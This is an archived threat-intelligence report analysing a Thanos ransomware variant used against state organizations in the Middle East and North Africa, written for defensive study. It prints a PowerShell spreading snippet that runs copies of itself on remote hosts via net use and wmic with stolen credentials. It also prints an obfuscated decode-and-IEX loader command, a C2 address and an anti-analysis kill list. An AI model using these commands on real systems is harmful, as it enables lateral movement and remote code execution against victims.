{
	"id": "37c4dc78-55cf-4855-8d8e-ae57eead8db1",
	"created_at": "2026-04-06T00:16:44.250367Z",
	"updated_at": "2026-04-10T03:20:04.704605Z",
	"deleted_at": null,
	"sha1_hash": "18bc0dba0a44b0f87d3431151a441ba3c19ecc2d",
	"title": "Thanos Ransomware: Destructive Variant Targeting State-Run Organizations in the Middle East and North Africa",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 281802,
	"plain_text": "Thanos Ransomware: Destructive Variant Targeting State-Run\r\nOrganizations in the Middle East and North Africa\r\nBy Robert Falcone\r\nPublished: 2020-09-04 · Archived: 2026-04-02 10:44:26 UTC\r\nExecutive Summary\r\nOn July 6 and July 9, 2020, we observed files associated with an attack on two state-run organizations in the\r\nMiddle East and North Africa that ultimately installed and ran a variant of the Thanos ransomware. The Thanos\r\nvariant created a text file that displayed a ransom message requesting the victim transfer “20,000$” into a\r\nspecified Bitcoin wallet to restore the files on the system. We do not have visibility into the overall impacts of\r\nthese attacks or whether or not the threat actors were successful in receiving a payment from the victims.\r\nFigure 1. Thanos’ ransom note displayed after encrypting files.  \r\nThe ransomware was also configured to overwrite the master boot record (MBR), which is an important\r\ncomponent loaded on a system’s hard drive that is required for the computer to locate and load the operating\r\nsystem. The ransomware overwrites the MBR to display the same ransom message as the previously mentioned\r\ntext file, which is a technique we do not see often. The most notable example we’ve observed involved the Petya\r\nransomware in 2017. Overwriting the MBR is a more destructive approach to ransomware than usual. Victims\r\nwould have to expend more effort to recover their files – even if they paid the ransom. Fortunately, in this case,\r\nthe code responsible for overwriting the MBR caused an exception because the ransom message contained invalid\r\ncharacters, which left the MBR intact and allowed the system to boot correctly. 
This means that even though the\r\nransomware was configured to overwrite the MBR, the threat actors did not succeed in preventing the computers\r\nthey infected with the Thanos ransomware from booting.\r\nhttps://unit42.paloaltonetworks.com/thanos-ransomware/\r\nPage 1 of 11\n\nFigure 2. Thanos’ ransom note displayed if MBR overwrite was successful.\r\nThe Thanos ransomware was first discussed by Recorded Future in February 2020 when it was advertised for sale\r\non underground forums. The Thanos ransomware has a builder that allows actors to customize the sample with a\r\nvariety of available settings. The fact Thanos is for sale suggests the likelihood of multiple threat actors using this\r\nransomware. However, we believe with high confidence that the same actor used a Thanos variant in attacks on\r\ntwo state-run organizations in the Middle East and North Africa.\r\nBased on our telemetry, we first observed Thanos on Jan. 13, 2020, and have seen over 130 unique samples since.\r\nWe believe the threat actors had prior access to these organizations’ networks, as the samples contained credentials\r\nthat we believe the actors had stolen from systems on these organizations’ networks prior to the delivery of the\r\nransomware.\r\nThis particular attack involved multiple layers of PowerShell scripts, inline C# code and shellcode in order to load\r\nThanos into memory and to run it on the local system. These layers were largely based on code freely available in\r\nopen source frameworks, such as Sharp-Suite and Donut. One of the layers involved a custom PowerShell script that\r\nwas responsible for spreading Thanos to other systems on the local network using the previously mentioned stolen\r\ncredentials.\r\nWe analyzed this specific Thanos sample that the actors built for the Middle Eastern and Northern African state-run organizations. We determined that the ransomware was loaded into and run from within memory at these\r\norganizations. 
We found the Thanos variant is functionally very similar to the variant discussed by Fortinet in July\r\n2020. The sample analyzed by Fortinet also contained network-spreading functionality enabled, which included\r\nnetwork credentials from another state-run organization in the same municipality as the Middle Eastern state-run\r\norganization we observed. The sample analyzed by Fortinet included the same Bitcoin wallet and contact email\r\nthat we observed. When combined with the targeting of an organization in the same municipality in a similar time\r\nframe, this suggests a common actor behind these attacks.\r\nPalo Alto Networks customers are protected from the attacks discussed in this blog by WildFire, which correctly\r\nidentifies all related samples as malicious, and Cortex XDR, which blocks the components involved in this\r\nransomware infection.\r\nOverview of Thanos Variant Activity\r\nWe do not know how the actors delivered the Thanos ransomware to the two state-run organizations in the Middle\r\nEast and North Africa. However, we know the threat group behind the use of these tools had previous access to\r\nthese networks as they had already obtained valid credentials from the networks. The exact same Thanos sample\r\nwas used at both of these organizations, which suggests that the same actor created the sample using the Thanos\r\nbuilder.\r\nThe Thanos sample created for these networks executes several layers before the .NET Thanos ransomware runs\r\non a system, specifically using code from several open source frameworks. The layers start at the top with a\r\nPowerShell script that not only loads another PowerShell script as a sub-layer, but also attempts to spread the\r\nransomware to other systems on the network using previously stolen credentials. 
The PowerShell in the second\r\nlayer does nothing more than load embedded C# code inline so the initial PowerShell script can execute it. The C#\r\ncode is the third layer, and it is based on UrbanBishop, which is publicly available as part of the Sharp-Suite\r\nframework on GitHub. The UrbanBishop code is responsible for writing shellcode to a remote process and\r\nexecuting it; the shellcode is the final layer before the Thanos ransomware runs. The shellcode in this\r\ncase was created by Donut, which is another open source framework that generates shellcode capable of loading and\r\nexecuting .NET assemblies in memory.\r\nFigure 3. Layers executed to run the Thanos ransomware on the system.\r\nPowerShell Spreader\r\nThe PowerShell spreader, which we call LogicalDuckBill, has two primary purposes:\r\n1. Loading and running the Thanos ransomware.\r\n2. Spreading to other systems by copying itself to and executing itself on remote systems.\r\nThe loader functionality within LogicalDuckBill starts with a base64 encoded PowerShell script that it will decode\r\nand run using the IEX command. The decoded and executed PowerShell contains the following code, which\r\neffectively loads C# code based on UrbanBishop that LogicalDuckBill will call later to inject shellcode:\r\n$code = @\"\r\n[C# code based on UrbanBishop]\r\n\"@\r\nAdd-Type -TypeDefinition $code -Language CSharp\r\nLogicalDuckBill will then check to see if a file named “logdb.txt” or “logdb.txt.locked” exists in the “c:\\” drive\r\nbefore running, which is the method the spreader uses to be sure to only run one instance of the embedded\r\nransomware on each system. We also observed another related sample that looked for “logdbnnn.txt” instead,\r\nwhich is why we call this script LogicalDuckBill. 
If these files are not present, LogicalDuckBill will write “1” to\r\nthis text file and then continue to carry out its functionality.\r\nLogicalDuckBill then creates a “notepad.exe” process and iterates through running processes to find\r\nthe process ID (PID) of the “notepad.exe” process it created. With the PID of the notepad process, the PowerShell\r\nscript calls the “Do” method in the loaded C# code based on UrbanBishop, which ultimately injects shellcode\r\ngenerated by the Donut framework into the notepad process and executes it. The shellcode then decrypts and loads\r\nan embedded .NET executable into memory and executes it, which is the Thanos ransomware payload.\r\nThe spreader functionality of LogicalDuckBill starts with the script using the Get-NetTCPConnection cmdlet to\r\nget the remote addresses of the current TCP connections on the system. The code then looks through these remote\r\naddresses for those that start with 10., 172. and 192. as the first octet and will iterate through each discovered\r\nnetwork by changing the last octet from 1 to 254 in a loop. For each iteration, the script will use the Test-NetConnection cmdlet to test whether it can connect to each remote system over SMB port tcp/445, and if it can,\r\nit uses the net use command to connect to the remote system with previously stolen credentials and mounts the\r\nremote system’s C: drive to the local system’s X: drive. The script then uses the copy command to copy itself to\r\nthe newly mapped X: drive, which effectively copies LogicalDuckBill to the remote system. The script will then\r\nuse wmic to run process call create on the remote system to run the newly copied LogicalDuckBill sample on the\r\nremote system. 
The spreading functionality finishes each iteration by deleting the mapped drive, all of which is\r\ncarried out by the following code:\r\nif((Test-NetConnection $tr -Port 445).TcpTestSucceeded){\r\nnet use x: \\\\[IP address]\\c$ /user:[Victim Domain]\\[Username] [Password]\r\ncopy c:\\windows\\update4.ps1 x:\\windows\\update4.ps1\r\nwmic /node:[IP address] /user:[Victim Domain]\\[Username] /password:[Password] process call create \"powershell\r\n-exec bypass -file c:\\windows\\update4.ps1\"\r\nnet use x: /del /y\r\n}\r\nThis spreading method in LogicalDuckBill is similar to one found within Thanos’ C# code. However, using the\r\nPowerShell script to spread allowed the actors to include previously stolen network credentials when creating the\r\nmapped drive and when running the copied PowerShell script using wmic.\r\nThanos Ransomware\r\nThe Thanos ransomware was first observed by Recorded Future in February 2020 when it was advertised for sale\r\non underground forums. The Thanos ransomware has code overlaps with other ransomware variants, such as\r\nHakbit, and has a builder that allows the user to customize the sample with a variety of available settings. This\r\nransomware appears to be still under active development, as we observed newly added functionality in the\r\nsamples built to run on the Middle Eastern and Northern African state-run organizations compared to the original\r\nsamples analyzed by Recorded Future. In fact, the Thanos ransomware built to run on these two organizations’\r\nnetworks was closer in available functionality to the variant discussed by Fortinet in July 2020. 
The most obvious\r\ndifference is that the disabling of safe boot discussed by Fortinet is not available in these samples.\r\nLike other Thanos ransomware samples, the variant built to run on these two organizations’ networks uses a 2048-\r\nbit RSA public key to encrypt files whose file extensions match those listed in Table 1. After encrypting the file’s\r\ncontents, Thanos will add the file extension “.locked” to the file on disk.\r\ndat ppt mdb odg backup aiff\r\ntxt doc dbf raw pdf flac\r\njpeg docx odb nef cert m4a\r\ngif sxi myd svg docm csv\r\njpg sxw php psd xlsm sql\r\npng odt java vmx dwg ora\r\nphp hwp cpp vmdk bak mdf\r\ncs tar pas vdi qbw ldf\r\ncpp bz2 asm lay6 nd ndf\r\nrar mkv key sqlite3 tlg dtsx\r\nzip eml pfx sqlitedb lgb rdl\r\nhtml msg pem accdb pptx dim\r\nhtm ost p12 java mov mrimg\r\nxlsx pst csr class xdw qbb\r\nxls edb gpg mpeg ods rtf\r\navi sql aes djvu wav 7z\r\nmp4 accdb vsd tiff mp3\r\nTable 1. List of extensions of files that Thanos will encrypt.\r\nThis variant of Thanos writes a ransom note to a file named “HOW_TO_DECYPHER_FILES.txt” to the desktop\r\nand all of the folders that contained files that Thanos encrypted. The ransom note, as seen in Figure 2, requests\r\n“20,000$” worth of Bitcoin be transferred to a wallet “1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9” and a\r\ncontact email of “josephnull@secmail.pro” to recover the encrypted files. The contact email and Bitcoin wallet ID\r\nwere seen by other researchers and organizations in July 2020, as seen in the .HTA ransom note displayed in\r\nFortinet’s blog and several tweets.\r\nThe features and functionality within the Thanos ransomware have been analyzed by other organizations. Instead\r\nof rehashing this analysis, we will only discuss the functionality that was enabled within this variant of Thanos\r\nthat had not been discussed previously. 
However, we delineate which previously discussed functionalities are\r\ndisabled and enabled in this variant of Thanos in Tables 2 and 3 respectively.\r\nMax. File Size Protect Process Disable FAC\r\nPersistence - Melt Wallpaper Static Pass\r\nDeceiving Msg Immortal Process RIPlace\r\nUnlock Files FTP Logger Data Stealer\r\nAnti-VM Wake-on-LAN Max. Steal Size\r\nDelay Delayed Activation Alternate Algo\r\nAMSI Bypass Client Expiration Drag and Drop\r\nTable 2. Disabled functionality, which are likely unchecked boxes on the Thanos ransomware builder user\r\ninterface (UI).\r\nKill Defender Fast Mode Enhanced Notifications\r\nLAN AntiKill Customize Notifications\r\nTable 3. Enabled functionality, which are likely checked boxes on the Thanos ransomware builder UI.\r\nThe first configuration option enabled that doesn't match the analysis of previous variants of Thanos starts with\r\nthe code trying to disable User Account Control (UAC) by setting the keys \"LocalAccountTokenFilterPolicy\" and\r\n\"EnableLinkedConnections\" in SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System to 1. It then\r\nattempts to enumerate local and mapped storage volumes. To enumerate the local volumes, the code creates and\r\nruns a batch script that is almost exactly the same as the batch script used by Ragnar Locker ransomware to\r\nenumerate the local storage volumes. Ragnar Locker used this script to create a VirtualBox configuration file that\r\nsets these volumes as SharedFolders, which allows Ragnar Locker to access the local storage volumes while it\r\nruns within a VirtualBox virtual machine, as discussed by Sophos. The Thanos implementation does not write the\r\nresults to a VirtualBox configuration file. Instead, it just prints the configuration to the screen, but does not save\r\nthe output. 
Therefore, we cannot be certain of the purpose of this functionality.\r\nThe second functionality enabled in this sample that had not been observed in previous Thanos variants involved\r\nthe ability to overwrite the master boot record (MBR). Once the code checks to see if the operating system version\r\nis not \"Windows 10\" or \"Windows 8,\" the code will attempt to open \"\\\\.\\PhysicalDrive0\" and write a 512-byte\r\nstring to offset 0. The byte array that is written to offset 0 of \"\\\\.\\PhysicalDrive0\" initially has a ransom message of\r\n\"Your files are encrypted. Contact us at: get-my-data@protonmail.com...\", but the code will replace this string\r\nwith the following string before writing to disk:\r\nDon\\xe2\\x80\\x99t worry, you can return all your files!\\r\\n\\r\\nThe Price to get all things to the normal :\r\n20,000$\\r\\nMy BTC Wallet ID :\\r\\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\\r\\n\\r\\nContact:\r\njosephnull@secmail.pro\\r\\n\r\nThe interesting part of the overwriting of the MBR in this specific sample is that it does not work correctly, which\r\ncan be blamed on either a programming error or the custom message included by the actor. As you can see above,\r\nthe custom message has the bytes \"\\xe2\\x80\\x99\" for the apostrophe character in unicode, but the code attempts to\r\nconvert each character using the \"Convert.ToByte\" function to replace a single byte in the initial ransom string.\r\nHowever, the unicode apostrophe character is three bytes long and causes an exception that breaks the MBR\r\noverwriting functionality. We confirmed that after changing this single character, the MBR overwriting\r\nfunctionality works, which results in the following being displayed instead of Windows booting correctly:\r\nThe third previously unmentioned functionality in this Thanos sample involves creating a thread that watches for\r\nnewly connected storage volumes. 
The code uses a management event watcher that calls a function when a new\r\nstorage volume is connected using the following WMI query:\r\nSELECT * FROM Win32_VolumeChangeEvent WHERE EventType = 2\r\nWhen the event watcher detects a new storage volume connected, it creates a thread that carries out the file\r\nencrypting functionality used by Thanos to encrypt files on the original storage volumes.\r\nThe last functionality added to this version of Thanos is the ability to detect and kill more analysis tools to evade\r\ndetection and analysis. The sample will enumerate through running processes and kill those whose names match\r\nthe following:\r\nhttp analyzer stand-alone intercepter procexp64\r\nfiddler Intercepter-NG RDG Packer Detector\r\neffetech http sniffer ollydbg CFF Explorer\r\nfiresheep x64dbg PEiD\r\nIEWatch Professional x32dbg protection_id\r\ndumpcap dnspy LordPE\r\nwireshark dnspy-x86 pe-sieve\r\nwireshark portable de4dot MegaDumper\r\nsysinternals tcpview ilspy UnConfuserEx\r\nNetworkMiner dotpeek Universal_Fixer\r\nNetworkTrafficView dotpeek64 NoFuserEx\r\nHTTPNetworkSniffer ida64\r\ntcpdump procexp\r\nTable 4. List of tools this Thanos variant will detect and kill to evade detection\r\nPossibly Related Downloader: Introducing PowGoop\r\nWhile we cannot confirm the connection, we believe the actors deploying the Thanos ransomware at the Middle\r\nEastern state-run organization also used a downloader that we call PowGoop. The actors would use the PowGoop\r\ndownloader to reach out to a remote server to download and execute additional PowerShell scripts. The files\r\nexisted in the same environment as the LogicalDuckBill sample previously discussed, but we did not observe the\r\nactors specifically running both PowGoop and the LogicalDuckBill spreader. 
Also, as expected, there is very little\r\ncode overlap between the PowerShell code in this downloader and LogicalDuckBill, as their functionality differs\r\ndramatically. The only code overlap is a common variable name $a that both of the scripts use to store the base64\r\nencoded data prior to decoding, which is not a strong enough connection to suggest a common author.\r\nThe PowGoop downloader has two components: a DLL loader and a PowerShell-based downloader. The\r\nPowGoop loader component is responsible for decrypting and running the PowerShell code that comprises the\r\nPowGoop downloader. The PowGoop loader DLL that existed in the same environment as LogicalDuckBill had a\r\nfilename of goopdate.dll that was likely sideloaded by the legitimate and signed Google Update executable. The\r\nsideloading process would start with the legitimate GoogleUpdate.exe file loading a legitimate DLL with a name\r\nof goopdate86.dll. The sideloading would occur when the goopdate86.dll library loads the goopdate.dll file, which\r\neffectively runs the PowGoop loader. We observed the following files that are likely associated:\r\nSHA256 Filename\r\nb60e92004d394d0b14a8953a2ba29951c79f2f8a6c94f495e3153dfbbef115b6 GoogleUpdate.exe\r\ndea45dd3a35a5d92efa2726b52b0275121dceafdc7717a406f4cd294b10cd67e goopdate86.dll\r\na224cbaaaf43dfeb3c4f467610073711faed8d324c81c65579f49832ee17bda8 goopdate.dll\r\nb7437e3d5ca22484a13cae19bf805983a2e9471b34853d95b67d4215ec30a00e config.dat\r\nTable 5. List of files associated with the sideloading of the PowGoop downloader\r\nThe goopdate.dll file is the PowGoop loader, whose functionality exists within an exported function named\r\nDllRegisterServer. 
The goopdate.dll file’s DllEntryPoint function, which would be called if loaded via the\r\nsideloading process mentioned above, does nothing more than attempt to run the DllRegisterServer exported\r\nfunction using the following command:\r\nrundll32.exe \u003cmodule filename\u003e,DllRegisterServer\r\nThe functional code in DllRegisterServer reads a file named config.dat, decodes it and runs it as a PowerShell\r\nscript, which is the PowGoop downloader component. To decode the config.dat file, the DLL builds and executes\r\na PowerShell script using the CreateProcessA function. The PowerShell script built by the PowGoop loader will\r\nread the contents of the config.dat file, base64 decode and decrypt the contents using a simple subtract-by-two\r\ncipher and run the resulting PowGoop downloader script using the IEX command, as seen in the following:\r\npowershell -exec bypass function bdec($in){$out = [System.Convert]::FromBase64String($in);return\r\n[System.Text.Encoding]::UTF8.GetString($out);}function bDec2($szinput){$in =\r\n[System.Text.Encoding]::UTF8.GetBytes($szinput);for ($i=0; $i -le $in.count -1; $i++){$in[$i] = $in[$i] -\r\n2;}return [System.Text.Encoding]::UTF8.GetString($in);}function bDd($in){$dec = bdec $in;$temp = bDec2\r\n$dec;return $temp;}$a=get-content C:\\\\Users\\\\[username]\\\\Desktop\r\nconfig.dat;$t =bDd $a;iex($t);\r\nThe config.dat file we decrypted is the PowGoop downloader that the actors configured to use the following URL\r\nas its command and control (C2):\r\nhttp://107.174.241[.]175:80/index.php\r\nThe PowGoop downloader will communicate with the C2 server via HTTP GET requests to this URL. 
It will\r\nexpect the C2 server to respond to requests with base64 encoded data that the script will decode, decompress the\r\ndecoded data using System.IO.Compression.GzipStream and then decrypt the decompressed data using the same\r\nsubtract by two cipher used to decrypt the config.dat file. It will first communicate with the C2 to obtain a unique\r\nidentifier value that the C2 will assign to the compromised system. After obtaining this identifier, the script will\r\ncontinue to communicate with the C2 to obtain Tasks, which the script will decode, decompress, decrypt and run\r\nas PowerShell scripts. The script exfiltrates the result of a task to the C2 by encrypting the result using an add by\r\ntwo cipher, compressing the ciphertext and base64 encoding it, and transmitting it to the C2 server using a GET\r\nrequest with the data in the Cookie field of the HTTP request, specifically as the R value.\r\nConclusion\r\nActors used the Thanos ransomware to encrypt files and a PowerShell script to spread to additional systems,\r\nspecifically on networks of two state-run organizations in the Middle East and North Africa. The Thanos variant\r\ncreated a text file that displayed a ransom message requesting the victim transfer “20,000$” into a specified\r\nBitcoin wallet to restore the files on the system.\r\nWhile the Thanos ransomware is not new, it appears that it is still under active development as the variant used in\r\nthese attacks contained new functionality. The new functionality included the ability to detect and evade more\r\nanalysis tools, the enumeration of local storage volumes via a technique used by the Ragnar Locker ransomware\r\nand a new capability to monitor for newly attached storage devices.\r\nMost importantly, this variant of Thanos also included the new ability to overwrite the MBR and display the same\r\nransom message. 
Overwriting the MBR is a much more destructive approach to ransomware than previously used\r\nby Thanos and would require more effort for victims to recover their files even if they paid the ransom.\r\nPalo Alto Networks customers are protected from the attacks discussed in this blog in the following ways:\r\nAll known Thanos ransomware and LogicalDuckBill samples have malicious verdicts in WildFire.\r\nAutoFocus customers can track this ransomware, PowerShell spreading script and the potentially related\r\ndownloader with the tags Thanos, LogicalDuckBill and PowGoop.\r\nCortex XDR blocks Thanos ransomware, LogicalDuckBill and PowGoop.\r\nIndicators of Compromise\r\nPowGoop Infrastructure\r\n107.174.241[.]175\r\nSource: 
https://unit42.paloaltonetworks.com/thanos-ransomware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/thanos-ransomware/"
	],
	"report_names": [
		"thanos-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434604,
	"ts_updated_at": 1775791204,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/18bc0dba0a44b0f87d3431151a441ba3c19ecc2d.pdf",
		"text": "https://archive.orkl.eu/18bc0dba0a44b0f87d3431151a441ba3c19ecc2d.txt",
		"img": "https://archive.orkl.eu/18bc0dba0a44b0f87d3431151a441ba3c19ecc2d.jpg"
	}
}